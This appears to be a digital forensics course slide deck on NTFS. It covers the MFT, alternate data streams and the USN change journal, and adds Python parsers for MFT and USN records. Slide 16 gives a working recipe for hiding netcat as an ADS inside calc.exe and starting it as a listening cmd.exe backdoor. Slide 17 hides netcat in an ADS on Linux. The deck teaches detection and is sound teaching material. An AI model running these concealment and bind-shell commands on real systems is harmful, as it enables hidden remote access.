Slide 1: NTFS
Slide 2: Overview
History and Usage
NTFS Structure
MFT
Alternate Data Streams
  Writing to and reading from
  Example backdoors
$USNJrnl
Additional Research Suggestions
Slide 3: History and Usage
Created by Microsoft to provide many features not available in a FAT file system:
  Journaling
  Security features
  Larger volume support
  Other performance and space-saving enhancements
Supported by Windows NT 4.0, Windows Server 2000, and above
Used for hard disks: previously it could only be used for hard disks, but it now works on flash drives and removable media
The default file system your Windows OS resides on
Slide 4: NTFS Structure
Clusters on an NTFS volume are numbered sequentially from the beginning of the partition; these are the logical cluster numbers. NTFS stores all objects in the file system using a record called the Master File Table (MFT), which is similar in structure to a database.
Slide 5: NTFS Structure
NTFS Boot Sector - Contains the BIOS parameter block, which stores information about the layout of the volume and the file system structures, as well as the boot code (MBR).
Master File Table - Contains the information necessary to retrieve files from the NTFS partition, such as the attributes of a file.
File System Data - Stores data that is not contained within the Master File Table.
Master File Table Copy - Includes copies of the records essential for recovering the file system if there is a problem with the original copy.
Volume layout (diagram): NTFS Boot Sector | Master File Table | File System Data | Master File Table (Copy)
Slide 6: MFT
The Master File Table (MFT) contains entries that describe all system files, user files, and directories. The MFT even contains an entry (#0) that describes the MFT itself, which is how its current size is determined. Other system files in the MFT include the root directory (#5), the cluster allocation map, the security descriptors, and the journal.
Slide 7: MFT Entries
Each MFT entry is given a number. User files and directories start at MFT entry #25.
An entry contains attribute information:
  MAC times
  File name
  $DATA stream (file content)
  Index Allocation and Index Root, which hold directory contents stored in a B-Tree
Slide 8: MFT Entries
Each type of attribute is given a numerical value, and more than one instance of a type can exist for a file. The "id" value of each attribute allows one to specify an instance; a given file can therefore have more than one $DATA attribute. To get a mapping of attribute type values to names, use the fsstat command, which displays the contents of the $AttrDef system file.
Slide 9: MFT Entries
Entry layout (diagram): Standard Information | File or Directory Name | Data or Index | Unused Space
Slide 10: MFT Entry Type Identifiers
The output of fls will often show the metadata address of a file on an NTFS volume as <inode> followed by an attribute type identifier and an attribute id. An address ending in the $DATA type identifier with id 0 refers to the 0th $DATA stream of that entry; similarly, an address ending in the $STANDARD_INFORMATION type identifier refers to the raw $STANDARD_INFORMATION data for that file.
Slide 11: MFT Parsing
Sleuthkit
  Use fls to list files and streams
  Use istat to list MFT entry data about a specific file
analyzemft.py
  icat -o 1 disk.img 0 > mft.data
  analyzemft.py -f mft.data -o mft.csv
mft.pl
  mft.pl mft.data    # dumps parsed data to stdout
Slide 12: MFT Additional Information
Directory structures
  File names and MFT entry pointers are stored as an alphabetically sorted B-Tree.
  Each MFT entry also stores the metadata address of the parent directory's MFT entry.
Slide 13: MFT Deleted Files
When a file is deleted, several things occur:
  The MFT entry has a flag that is set to "unused", and the bitmap for the MFT entries is updated.
  The bitmap for the clusters is also updated, if needed.
  The name is removed from the sorted name tree. This removal is complex, and it is what sometimes makes it hard to recover the file name of a deleted file stored on an NTFS volume.
To find the deleted files for a specific parent directory, determine the MFT entry of the directory, then scan the MFT for all unallocated entries that reference that directory as their parent. The file name is stored in the MFT entry, so the full path can be determined from the path of the parent directory and the name stored in the file's MFT entry. (Note: Sleuthkit's fls does this for you.)
Slide 14: Alternate Data Streams
Why do they exist? To add "extra" information to files without altering the original file format or content. For example, one file stream could hold the security information for the file, such as access permissions, while another could hold data that describes the purpose of the file, its author, and the MAC times. $USNJrnl is an example of a "legit" use of ADS.
Slide 15: Alternate Data Streams
Things to know about ADS
  There is no limit on the size of the streams (the size is not even reported on most OSes).
  Streams can be attached not only to files but also to folders and drives.
  Any stream of binary information can constitute a file (JPEG, executables, etc.).
  ADS have no attributes of their own (permissions stay the same as the host file's).
  In the past, antivirus software wouldn't scan these streams. You should probably make sure yours does.
  It is possible for a user with appropriate permissions to add streams to system files.
  You have to use special tools to detect ADS streams.
  In some cases streams have been used to remotely exploit a web server. *Not very likely today.
Slide 16: Alternate Data Streams
How to create a stream (Windows)
  type c:\nc.exe > C:\windows\system32\calc.exe:svchost.exe
  Forks the netcat program into calc.exe as an ADS called svchost.exe. In this example a backdoor is created, and someone with access to the machine can run the following command to enable the backdoor:
  start /B C:\windows\system32\calc.exe:svchost.exe -d -L -p e cmd.exe
  echo "HIDDEN" > test.txt:hidden.txt
Slide 17: Alternate Data Streams
How to create a stream (Linux)
  sudo mount -t ntfs-3g -o uid=$(id -u),gid=$(id -g),user_xattr /dev/loop0p1 ~/mnt    # ntfs-3g expects numeric uid/gid values
  cat /bin/nc | attr -s "hidden.bin" ~/mnt/test.txt
  echo "HIDDEN" | attr -s "hidden.txt" ~/mnt/test.txt    # many ways to do this
Slide 18: Alternate Data Streams
How to detect an ADS (Windows)
  Sysinternals, using the Streams utility
  Many other GUI-based applications
  Proprietary software like EnCase
  dir /R
Slide 19: Alternate Data Streams
How to detect an ADS (Linux)
  Autopsy (GUI created by the makers of Sleuthkit to be similar to something like EnCase)
  istat (you need to do this one inode at a time; maybe iterate through all inodes, then call istat)
  fls: fls -r -p -o 1 disk.img | grep -e ':.*:'    # this might work for you
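The following Python is an added example, not code from the slides or from Sleuthkit: it parses one raw MFT FILE record the way istat does, applies the update sequence fixups, walks the attribute headers, and reports every $DATA attribute by id and name, so a named $DATA attribute (an ADS, slides 8 and 19) stands out. The 1024-byte record it parses is constructed inline; the attribute type ids are the standard ones listed in $AttrDef.

```python
import struct

ATTR_DATA, ATTR_END = 0x80, 0xFFFFFFFF                   # type ids from $AttrDef (see fsstat)

def apply_fixups(rec):
    """Restore the last 2 bytes of every 512-byte sector from the update sequence array."""
    usa_off, usa_count = struct.unpack_from("<HH", rec, 4)
    buf, usn = bytearray(rec), rec[usa_off:usa_off + 2]
    for i in range(1, usa_count):
        if buf[512 * i - 2:512 * i] != usn:
            raise ValueError("torn MFT record: fixup mismatch")
        buf[512 * i - 2:512 * i] = rec[usa_off + 2 * i:usa_off + 2 * i + 2]
    return bytes(buf)

def list_data_streams(rec):
    """Return (attr id, name, resident content or None) per $DATA attribute; a non-empty name is an ADS."""
    if rec[:4] != b"FILE": raise ValueError("not an MFT FILE record")
    rec, streams = apply_fixups(rec), []
    off = struct.unpack_from("<H", rec, 0x14)[0]          # offset of the first attribute
    while off + 16 <= len(rec):
        atype, alen, nonres, nlen, noff, _flags, aid = struct.unpack_from("<IIBBHHH", rec, off)
        if atype == ATTR_END or alen == 0:
            break
        if atype == ATTR_DATA:
            csize, coff = struct.unpack_from("<IH", rec, off + 0x10)   # meaningful only when resident
            streams.append((aid, rec[off + noff:off + noff + 2 * nlen].decode("utf-16-le"),
                            None if nonres else rec[off + coff:off + coff + csize]))
        off += alen
    return streams

def _resident(atype, aid, name, content):
    """Constructed resident attribute: 0x18-byte header, UTF-16 name, 8-aligned content."""
    n = name.encode("utf-16-le")
    coff = (0x18 + len(n) + 7) & ~7
    alen = (coff + len(content) + 7) & ~7
    hdr = struct.pack("<IIBBHHHIH", atype, alen, 0, len(name), 0x18, 0, aid, len(content), coff)
    return (hdr.ljust(0x18, b"\0") + n).ljust(coff, b"\0") + content.ljust(alen - coff, b"\0")

def build_sample_record():
    """Constructed 1024-byte MFT entry for test.txt: $STANDARD_INFORMATION, unnamed $DATA, ADS hidden.txt."""
    attrs = (_resident(0x10, 0, "", bytes(72)) + _resident(ATTR_DATA, 1, "", b"homework")
             + _resident(ATTR_DATA, 2, "hidden.txt", b"HIDDEN") + struct.pack("<I", ATTR_END))
    rec = bytearray(1024)        # usa at 0x30 with 3 entries, attributes start at 0x38, flags=1 (in use)
    struct.pack_into("<4sHHQHHHHII", rec, 0, b"FILE", 0x30, 3, 0, 1, 1, 0x38, 1, 0x38 + len(attrs), 1024)
    rec[0x38:0x38 + len(attrs)] = attrs
    rec[0x30:0x32] = usn = b"\x07\x00"                    # constructed update sequence number
    for i in (1, 2):                                      # save each sector's last 2 bytes, then stamp the USN
        rec[0x30 + 2 * i:0x32 + 2 * i] = rec[512 * i - 2:512 * i]
        rec[512 * i - 2:512 * i] = usn
    return bytes(rec)
```

Feed it 1024-byte slices of an icat dump of entry 0 (the $MFT itself) to walk a real volume; a fixup mismatch means the record was only partially written and should be treated as unreliable.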
Slide 20: Alternate Data Streams
How to dump the contents of an ADS (Windows)
  notepad test.txt:hidden.txt    # the type command doesn't work for this; save as hidden.txt
  powershell Get-Content -Stream hidden.txt test.txt
Slide 21: Alternate Data Streams
How to dump the contents of an ADS (Linux)
  sudo mount -t ntfs-3g -o uid=$(id -u),gid=$(id -g),streams_interface=windows /dev/loop0p1 ~/mnt
  cat ~/mnt/test.txt:hidden.txt > hidden.txt
Slide 22: Alternate Data Streams
How to delete an ADS
  Windows: streams -d test.txt    # deletes all streams except the file's main data stream
  PowerShell: Remove-Item -Stream hidden.txt test.txt
  Linux: sudo mount -t ntfs-3g -o uid=$(id -u),gid=$(id -g),streams_interface=windows /dev/loop0p1 ~/mnt    # the file:stream name form needs streams_interface=windows, as on slide 21
         rm ~/mnt/test.txt:hidden.txt
Slide 23: $USNJournal
Update Sequence Number Journal File - While the different file operations occur on disk in an NTFS volume, the change journal keeps a record of the reason behind each operation, such as file creation, deletion, encryption, directory creation, deletion, etc.
Applications and administrators can create, delete, and re-create change journals.
There is one USN change journal per volume, and it is turned on by default since Windows Vista.
The per-volume $USNJournal is located at $EXTEND/$USNJournal.
Slide 24: $USNJournal Behavior
Does not overwrite records like the $LogFile does.
Allocates and deallocates as it grows; this means we may find records in unallocated space.
Contains two ADS:
  $MAX - Information about the change journal, such as the maximum size
  $J - The contents of the change journal; includes information such as the date and time of the change, the reason for the change, the MFT entry, the MFT parent entry, and others
Slide 25: $USNJournal - Read from the stream
Windows
  USN-Record-Carver
  UsnJrnl2Csv
Linux
  usnjls    # extract and parse in multiple formats
  usnj.pl    # parse an extracted journal and output as CSV
  Use fls and icat to dump the $USNJournal $J stream
Slide 26: $USNJournal - Using the USNJournal to detect anti-forensics
Data in obscure locations
  Malware will often insert itself in obscure locations where the user is not likely to see the files; the recycle bin is a popular choice.
  If we know a time frame to look for suspicious activity, the USNJrnl can show us where files were hidden.
  Example: an intrusion detection system alerts on a trojan. The USNJrnl can tell us where the trojan installed itself by looking for file activity immediately after the alert.
Slide 27: $USNJournal - Using the USNJournal to detect anti-forensics
Data destruction
  Often malware will write a new file that then deletes the original file which "dropped" the malware on the system. The USNJrnl can help us reconstruct this chain of events.
Time stomping
  Malware or malicious actors can overwrite the MFT metadata, changing timestamps to obfuscate their actions. The USNJrnl provides a second set of timestamps for comparison.
Slide 28: $USNJournal - Using the USNJournal to detect anti-forensics
File system tunneling - if a file is renamed or deleted and then a file with the same name is created in the same directory, the new file will retain the timestamps of the old file.
Microsoft's reasoning: "enable compatibility with programs that rely on file systems being able to hold onto file meta-info for a short period of time. This occurs after deletion or renaming and re-introducing a new directory entry with that meta-info (if a create or rename occurs to cause a file of that name to appear again in a short period of time)."
Used in malware sometimes, or if you want to "prove" to your instructor you actually did your homework before the due date but forgot to submit it. (NOT RECOMMENDED, esp. in this class)
Slide 29: $USNJournal - Using the USNJournal to detect anti-forensics
File system tunneling, for example: malware could rename services.exe and, within a fraction of a second, create a new services.exe file in the same directory. The new file would have the same SIA and FNA timestamps as the original services.exe (SIA = Standard Information Attribute, FNA = Filename Attribute; both can be viewed using istat). However, the USNJrnl entry for this file would show the "true" creation date.
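Added example (Python, not from the slides or from any of the tools listed on slide 25): a parser for USN_RECORD_V2 entries in a dumped $J stream that decodes the timestamp, reason flags, MFT entry and parent entry described on slide 24, plus a check for the tunneling pattern above: a name that is renamed away or deleted and re-created under a different MFT entry in the same directory within the tunnel window. The $J extract and its FILETIME base are constructed; the 15-second window is Windows' default tunnel cache age and is a parameter.

```python
import struct
from datetime import datetime, timedelta, timezone

REASONS = {0x100: "FILE_CREATE", 0x200: "FILE_DELETE", 0x1000: "RENAME_OLD_NAME",  # USN_REASON_* flags
           0x2000: "RENAME_NEW_NAME", 0x8000: "BASIC_INFO_CHANGE", 0x80000000: "CLOSE"}
def filetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)
def parse_usn_v2(blob):
    """Parse every USN_RECORD_V2 in a $J dump, stepping over the sparse zero padding between runs."""
    off, out = 0, []
    while off + 0x3C <= len(blob):
        rlen = struct.unpack_from("<I", blob, off)[0]
        if rlen == 0:                                   # zero-filled (sparse) region
            off += 8
            continue
        major, fref, pref, usn, ts, reason = struct.unpack_from("<H2xQQQqI", blob, off + 4)
        nlen, noff = struct.unpack_from("<HH", blob, off + 0x38)
        if major != 2: raise ValueError(f"unsupported USN record version {major} at offset {off}")
        out.append({"usn": usn, "time": filetime(ts), "name": blob[off + noff:off + noff + nlen].decode("utf-16-le"),
                    "mft": fref & 0xFFFFFFFFFFFF, "parent": pref & 0xFFFFFFFFFFFF,   # low 48 bits = entry number
                    "reasons": [n for f, n in REASONS.items() if reason & f]})
        off += rlen
    return out
def find_tunneling(records, window=timedelta(seconds=15)):
    """A name renamed away or deleted, then re-created under a new MFT entry in the same directory
    within the window (15 s is Windows' default tunnel cache age) is a candidate for tunneling."""
    hits, gone = [], {}
    for r in sorted(records, key=lambda r: r["usn"]):
        key = (r["parent"], r["name"].lower())
        if "RENAME_OLD_NAME" in r["reasons"] or "FILE_DELETE" in r["reasons"]:
            gone[key] = r
        elif "FILE_CREATE" in r["reasons"] and key in gone:
            old = gone.pop(key)
            if old["mft"] != r["mft"] and r["time"] - old["time"] <= window:
                hits.append((r["name"], old["mft"], r["mft"], r["time"]))
    return hits
def _rec(usn, ts, mft, parent, reason, name):
    n = name.encode("utf-16-le")                         # constructed record, sequence number 1 in both references
    rlen = (0x3C + len(n) + 7) & ~7                     # records are 8-byte aligned
    hdr = struct.pack("<IHHQQQqIIIIHH", rlen, 2, 0, mft | 1 << 48, parent | 1 << 48,
                      usn, ts, reason, 0, 0, 0x20, len(n), 0x3C)
    return (hdr + n).ljust(rlen, b"\0")
T0 = 133_000_000_000_000_000                            # constructed FILETIME base (100 ns ticks)
SAMPLE_J = b"".join([                                   # constructed $J extract; the root directory (#5) is the parent
    bytes(16),                                          # sparse padding before the first record
    _rec(1, T0, 60, 5, 0x1000, "services.exe"),                     # entry 60 renamed away ...
    _rec(2, T0 + 10, 60, 5, 0x2000 | 0x80000000, "services.bak"),   # ... to services.bak
    _rec(3, T0 + 5_000_000, 61, 5, 0x100, "services.exe"),          # new entry 61, same name, 0.5 s later
    _rec(4, T0 + 9_000_000_000, 70, 5, 0x100, "report.txt"),        # unrelated create 15 minutes later
])
```

On a real image, feed it the $J stream dumped with fls and icat as on slide 25; the "time" field of the FILE_CREATE hit is the creation time that time stomping or tunneling cannot alter.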
Slide 30: Additional Research Suggestions
$LogFile - metadata file that keeps a record of all operations that occurred in the NTFS volume.
  Tools exist to parse this file on Windows. A version that works on Linux might be a project idea.
  Sometimes contains information not found in the USNJrnl.
Read some advanced data recovery techniques in academic paper format at:
Slide 31: Questions?
Slide 32: Relevant Links
Slide 33: Relevant Links
If you really want to learn about $USNJournal structure
was-infected-with.html
If you really want to test your data recovery skills
For all you who are academics